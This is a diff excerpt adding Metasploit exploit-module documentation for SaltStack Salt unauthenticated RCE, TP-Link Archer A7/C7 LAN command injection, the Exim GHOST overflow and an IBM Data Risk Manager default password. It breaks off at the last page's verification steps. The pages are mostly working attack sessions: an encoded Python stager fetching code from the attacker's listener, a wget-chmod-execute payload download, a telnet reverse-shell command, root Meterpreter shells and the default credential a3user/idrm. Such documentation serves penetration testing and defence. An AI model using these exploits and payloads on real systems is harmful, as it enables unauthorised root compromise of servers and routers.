+    [*] Next chunk is 62734 bytes
+    [*] Next chunk is 63857 bytes
+    [*] Next chunk is 63812 bytes
+    [*] Next chunk is 46324 bytes
+    [*] Next chunk is 35989 bytes
+    [*] Next chunk is 38405 bytes
+    [*] Next chunk is 38978 bytes
+    [*] Next chunk is 38950 bytes
+    [*] Next chunk is 38935 bytes
+    [*] Next chunk is 40042 bytes
+    [*] Next chunk is 63562 bytes
+    [*] Next chunk is 63562 bytes
+    [*] Next chunk is 63521 bytes
+    [*] Next chunk is 63618 bytes
+    [*] Next chunk is 28951 bytes
+    [*] uploading payload
+    [*] Writing '/tmp/.u4aLoiq' (207 bytes) ...
+    [*] Max line length is 65537
+    [*] Writing 207 bytes in 1 chunks of 630 bytes (octal-encoded), using printf
+    [*] Launching xglance-bin...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (980808 bytes) to 2.2.2.2
+    [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:33373) at 2020-04-19 15:09:55 -0400
+    [+] Deleted /tmp/-L/lib64/libXm.so.3
+    [+] Deleted /tmp/.u4aLoiq
+    
+    meterpreter > getuid
+    Server username: no-user @ localhost.localdomain (uid=0, gid=1000, euid=0, egid=1000)
+    meterpreter > sysinfo
+    Computer     : localhost.localdomain
+    OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
+    Architecture : x64
+    BuildTuple   : i486-linux-musl
+    Meterpreter  : x86/linux
+    meterpreter >
+    ```

documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md

@@ -0,0 +1,249 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits unauthenticated access to the `runner()` and
+`_send_pub()` methods in the SaltStack Salt master's ZeroMQ request
+server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to
+execute code as root on either the master or on select minions.
+
+VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+known to be affected by the Salt vulnerabilities.
+
+Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+well as Vulhub's Docker image.
+
+### Setup
+
+**Note:** I did the bulk of my testing after manually installing Salt in
+an [Ubuntu 18.04 VM](#using-a-virtual-machine), but the [Docker image
+from Vulhub](#using-docker) may be quicker. YMMV.
+
+#### Using a virtual machine
+
+1. Set up an Ubuntu 18.04 VM
+2. Browse to [SaltStack's instructions for
+   Ubuntu](https://repo.saltstack.com/#ubuntu)
+3. Select `Pin to Minor Release` and change all versions to either
+   **2019.2.3** or **3000.1**, depending on the version you wish to test
+4. Follow the instructions, installing only the `salt-master` and
+   `salt-minion` packages necessary for testing
+5. Follow the [post-installation
+   configuration](https://docs.saltstack.com/en/latest/ref/configuration/index.html)
+
+You may now begin testing.
+
+#### Using Docker
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+**Note:** The Salt master is already configured and running in the
+following scenario. The majority of the steps below are for configuring
+and starting the minion. Version **2019.2.3** will be used.
+
+1. Run `git clone https://github.com/vulhub/vulhub`
+2. Run `cd vulhub/saltstack/CVE-2020-11651`
+3. Run `docker-compose up -d` to start the container in the background
+4. Run `docker exec -it cve-2020-11651_saltstack_1 bash` to drop to a
+   root shell inside the container
+5. Run `echo $'127.0.0.1\tsalt' >> /etc/hosts` to add the master to
+   `/etc/hosts` (this allows the minion to find the master)
+6. Run `salt-minion -d` to execute the minion in the background
+7. Run `salt-key -A` and accept the key for the minion
+
+You may now begin testing.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### Master (Python payload)
+
+This executes a Python payload on the master(s) specified by `RHOST(S)`.
+
+### Master (Unix command)
+
+This executes a Unix command payload on the master(s) specified by
+`RHOST(S)`.
+
+### Minions (Python payload)
+
+This executes a Python payload on the minions specified by the `MINIONS`
+option.
+
+### Minions (Unix command)
+
+This executes a Unix command payload on the minions specified by the
+`MINIONS` option.
+
+## Options
+
+### ROOT_KEY
+
+If you already have the master's root key, you may set it in this
+option. Note that the master regenerates the root key on each startup.
+
+### MINIONS
+
+This is the PCRE regex of minions to execute the payload on. Defaults to
+`.*` for all minions.
+
+### WfsDelay
+
+Set this to the number of seconds to wait for **all** sessions to come
+in. Defaults to **10 seconds**, though the exploit may wait up to 20
+seconds.
+
+## Scenarios
+
+### SaltStack Salt 2019.2.3 on Ubuntu 18.04
+
+#### Executing Python payload on the master
+
+```
+msf5 > use exploit/linux/misc/saltstack_salt_unauth_rce
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Master (Python payload)
+   1   Master (Unix command)
+   2   Minions (Python payload)
+   3   Minions (Unix command)
+
+
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > options
+
+Module options (exploit/linux/misc/saltstack_salt_unauth_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   MINIONS   .*               yes       PCRE regex of minions to target
+   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   ROOT_KEY                   no        Master's root key if you have it
+   RPORT     4506             yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
+   SSL       false            no        Negotiate SSL for incoming connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+
+
+Payload options (python/meterpreter/reverse_https):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The local listener hostname
+   LPORT  8443             yes       The local listener port
+   LURI                    no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Master (Python payload)
+
+
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5
+rhosts => 172.28.128.5
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1
+lhost => 172.28.128.1
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run
+
+[*] Started HTTPS reverse handler on https://172.28.128.1:8443
+[*] 172.28.128.5:4506 - Using auxiliary/gather/saltstack_salt_root_key as check
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
+[+] 172.28.128.5:4506 - Received serialized auth info
+[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Executing Python payload on the master: python/meterpreter/reverse_https
+[*] 172.28.128.5:4506 - Yeeting runner() at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))
+[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"runner", "fun"=>"salt.cmd", "kwarg"=>{"hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "fun"=>"cmd.exec_code", "lang"=>"python", "code"=>"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))"}, "user"=>"root", "key"=>"bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk="}
+[+] 172.28.128.5:4506 - Received runner() response: "\x01\x00\x00<\x82\xA3jid\xB420200510102113141303\xA3tag\xBDsalt/run/20200510102113141303"
+[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: kwpadl1s) Staging python payload (53902 bytes) ...
+[*] Meterpreter session 1 opened (172.28.128.1:8443 -> 172.28.128.5:48236) at 2020-05-10 05:21:15 -0500
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ubuntu-bionic
+OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```
+
+#### Executing Python payload on the minions
+
+```
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload)
+target => Minions (Python payload)
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run
+
+[*] Started HTTPS reverse handler on https://172.28.128.1:8443
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Executing Python payload on the minions: python/meterpreter/reverse_https
+[*] 172.28.128.5:4506 - Yeeting _send_pub() at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))
+[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"_send_pub", "kwargs"=>{"bg"=>true, "hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "show_jid"=>false, "show_timeout"=>false}, "user"=>"root", "tgt"=>".*", "tgt_type"=>"pcre", "jid"=>"20200510102150723893", "fun"=>"cmd.exec_code", "arg"=>["python", "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))"]}
+[+] 172.28.128.5:4506 - Received _send_pub() response: "\x01\x00\x00\x01\xC0"
+[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: foe5rluh) Staging python payload (53883 bytes) ...
+[*] Meterpreter session 2 opened (172.28.128.1:8443 -> 172.28.128.5:48388) at 2020-05-10 05:21:51 -0500
+[+] 172.28.128.5:4506 - Deleted /var/cache/salt/minion/proc/20200510102150723893
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ubuntu-bionic
+OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```

documentation/modules/exploit/linux/misc/tplink_archer_a7_c7_lan_rce.md

@@ -0,0 +1,93 @@
+## Description
+
+This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
+The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.
+
+This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski).
+
+## Vulnerable Application
+
+TP-Link Archer A7 (AC1750) v5 firmware version 190726
+TP-Link Archer C7 (AC1750) v5 firmware version 190726
+
+[Firmware TP-Link Archer A7](https://static.tp-link.com/2019/201908/20190827/Archer%20A7(EU)_V5_190811.zip)
+[Firmware TP-Link Archer C7](https://static.tp-link.com/2019/201908/20190816/Archer%20C7(EU)_V5_190726.zip)
+
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Connect to a target on the LAN interface
+  2. Start msfconsole
+  3. Do: ```use exploits/linux/misc/tplink_archer_a7_c7_lan_rce```
+  4. Set RHOST, LHOST and SRVHOST
+  5. Do ```check```
+  6. Do: ```run```
+  7. You should get a shell.
+ 
+## Options
+```
+Module options (exploit/linux/misc/tplink_archerC7_lan_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    20002            yes       The target port (TCP)
+   SRVHOST                   yes       IP address of the host serving the exploit
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/mipsbe/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+```
+
+## Scenarios
+~~~
+msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1
+RHOST => 192.168.0.1
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238
+LHOST => 192.168.0.238
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238
+SRVHOST => 192.168.0.238
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check 
+[+] 192.168.0.1:20002 - The target is vulnerable.
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > 
+[*] Started reverse TCP handler on 192.168.0.238:4444 
+[*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)
+[*] Starting up our web service on http://192.168.0.238:4445 ...
+[*] Using URL: http://192.168.0.238:4445/x
+[*] 192.168.0.1:20002 - Connecting to the target
+[*] 192.168.0.1:20002 - Sending command file byte by byte
+[*] 192.168.0.1:20002 - Command: wget http://192.168.0.238:4445/x;chmod +x x;./x
+[*] 192.168.0.1:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]
+[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]
+[*] 192.168.0.1:20002 - Command file sent, attempting to execute...
+[+] 192.168.0.1:20002 - Sending executable to the router
+[+] 192.168.0.1:20002 - Sit back and relax, Shelly will come visit soon!
+[*] Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:48112) at 2020-03-26 16:47:09 +0100
+[*] Server stopped.
+
+msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux ArcherC7v5 3.3.8 #1 Mon May 20 18:53:02 CST 2019 mips GNU/Linux
+~~~

documentation/modules/exploit/linux/smtp/exim_gethostbyname_bof.md

@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+The Exim GHOST buffer overflow is a vulnerability found by researchers from Qualys.
+On March 17th 2015, Qualys released an exploit module demonstrating the exploitability
+of this flaw, which is now `exim_gethostbyname_bof` in Metasploit Framework.
+
+When Qualys released the exploit, it included a lot of technical details for debugging
+and usage purposes. We decided to put all that here in a more readable format.
+
+### What is "GHOST"
+
+This is a heap based buffer overflow found in GNU C Library's **g**et**host**byname
+functions since glibc-2.2 (November 10, 2000), which is part of the Linux operating
+system, such as: Debian, Red Hat, CentOS, and Ubuntu.
+
+### Exploitable Requirements
+
+**On the server-side (victim):**
+
+* glibc-2.6 - glibc-2.17: The exploit depends on the newer versions' `fd_nextsize`
+(a member of the malloc_chunk structure) to remotely obtain the address of Exim's
+`smtp_cmd_buffer` in the heap.
+* Exim server. The first exploitable version is Exim-4.77, maybe older. The exploit
+depends on the newer versions' 16-KB `smtp_cmd_buffer` to reliably set up the heap as described in the advisory.
+* The Exim server also must enable `helo_try_verify_hosts` or `helo_verify_hosts`
+in the `/etc/exim4/exim4.conf.template` file. The `verify = helo` ACL might be exploitable
+too, but the attack vector isn't as reliable, therefore not supported by the module.
+
+For testing purposes, if you need to find a vulnerable system, you can try Debian 7
+(it should come with an exploitable Exim server):
+[debian-7.7.0-i386-DVD-1.iso](https://archive.org/download/Debian-7.7.0/debian-7.7.0-i386-DVD-1.iso)
+
+**On the attacker's side:**
+
+* The attacker's IPv4 address must have both forward and reverse DNS entries that match each other
+(Forward-Confirmed reverse DNS).
+
+### Troubleshooting
+
+If the `exim_gethostbyname_bof.rb` module has failed on you:
+
+| Failure  | Explanation |
+| -------- | ----------- |
+| bad `SENDER_HOST_ADDRESS` (nil) | The `SENDER_HOST_ADDRESS` datastore option was not specified |
+| bad `SENDER_HOST_ADDRESS` (not in IPv4 dotted-decimal notation) | The `SENDER_HOST_ADDRESS` datastore option was specified, but not in IPv4 dotted-decimal notation |
+| bad `SENDER_HOST_ADDRESS` (helo_verify_hosts) | The `SENDER_HOST_ADDRESS` datastore option does not match the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim). |
+| bad `SENDER_HOST_ADDRESS` (no FCrDNS) | the IPv4 address of the SMTP client (Metasploit) has no Forward-Confirmed reverse DNS. |
+| not vuln? old glibc? (no leaked_arch) | the remote Exim server is either not vulnerable, or not exploitable (glibc versions older than glibc-2.6 have no fd_nextsize member in their malloc_chunk structure). |
+| NUL, CR, LF in addr? (no leaked_addr) | Exim's heap address contains bad characters (NUL, CR, LF) and was therefore mangled during the information leak; this exploit is able to reconstruct most of these addresses, but not all (worst-case probability is ~1/85, but could be further improved). |
+| Brute-force SUCCESS followed by a nil reply, but no shell | the remote Unix command was executed, but spawned a bind-shell or a reverse-shell that failed to connect (maybe because of a firewall, or a NAT, etc). |
+| Brute-force SUCCESS followed by a non-nil reply, and no shell | The remote Unix command was executed, but failed to spawn the shell (maybe because the setsid command doesn't exist, or awk isn't gawk, or netcat doesn't support the -6 or -e option, or telnet doesn't support the -z option, etc). |
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/smtp/exim_gethostbyname_bof```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set SENDER_HOST_ADDRESS [ip]```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+### SENDER_HOST_ADDRESS
+
+The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)
+
+## Scenarios
+
+### Debian 7.7
+
+When everything is dialed in correctly, a successful attack should look like the following:
+
+```
+msf exploit(exim_gethostbyname_bof) > run
+
+[*] Started reverse double handler
+[*] Trying information leak...
+[!] {:heap_shift=>736}
+[!] {:write_offset=>128, :error=>"503 sender not yet given"}
+[!] {:write_offset=>136, :error=>"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"}
+[!] {:error=>["\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given", "", "503 \x89\x10", "177", "177\\177\\177", "vJN\\177\\177\\177\\177"]}
+[!] {:leaked_arch=>"x86"}
+[!] {:count=>{"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"=>8, "hF\xFE\xB7hF\xFE\xB7er not yet given"=>2}}
+[+] Successfully leaked_arch: x86
+[+] Successfully leaked_addr: b7fda760
+[*] Trying code execution...
+[!] ${run{/usr/bin/env setsid /bin/sh -c "sh -c '(sleep 4011|telnet 192.168.1.64 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.64 4444 >/dev/null 2>&1 &)'"}}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>21}
+[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>25}
+[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>20}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>8}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>6}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>12}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>19}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>29}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>23}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>18}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>14}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>3}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>29}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>28}
+[!] {:helo=>6144, :step=>6025, :addr=>"b7fd02a1", :offset=>26}
+[!] {:reply=>{:code=>"550", :lines=>["550 sikVtqGxFOjCBOWTbDupmIuJRmLmShFNqqUYRRPUolyxPmmgLCenEzConuVGWafjgycyRfXulGNwmAOvkqZkGobMyUIMPojZsaziCjVVyvabOrcieEWrLZSgnCCXHeXjIzGGfUALAIubgBEmsKsSWSGa\r\n"]}}
+[+] Brute-force SUCCESS
+[+] Please wait for reply...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo qaNpBmRBEus9XoVZ;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "qaNpBmRBEus9XoVZ\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (192.168.1.64:4444 -> 192.168.1.166:58859) at 2015-03-19 03:36:52 -0500
+[!] {:reply=>nil}
+
+id
+uid=104(Debian-exim) gid=112(Debian-exim) groups=112(Debian-exim)
+```

documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md

@@ -0,0 +1,35 @@
+## Vulnerable Application
+
+This module abuses a known default password in IBM Data Risk Manager. The 'a3user' has the default password 'idrm' and allows an attacker to log in to the virtual appliance via SSH.
+This can be escalated to full root access, as 'a3user' has `sudo` access with the default password.
+At the time of disclosure, this is a 0day. Versions <= 2.0.3 are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
+
+### Vulnerability information
+For more information about the vulnerability, check the advisory at:
+https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
+
+### Setup
+
+The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
+
+## Verification Steps
+
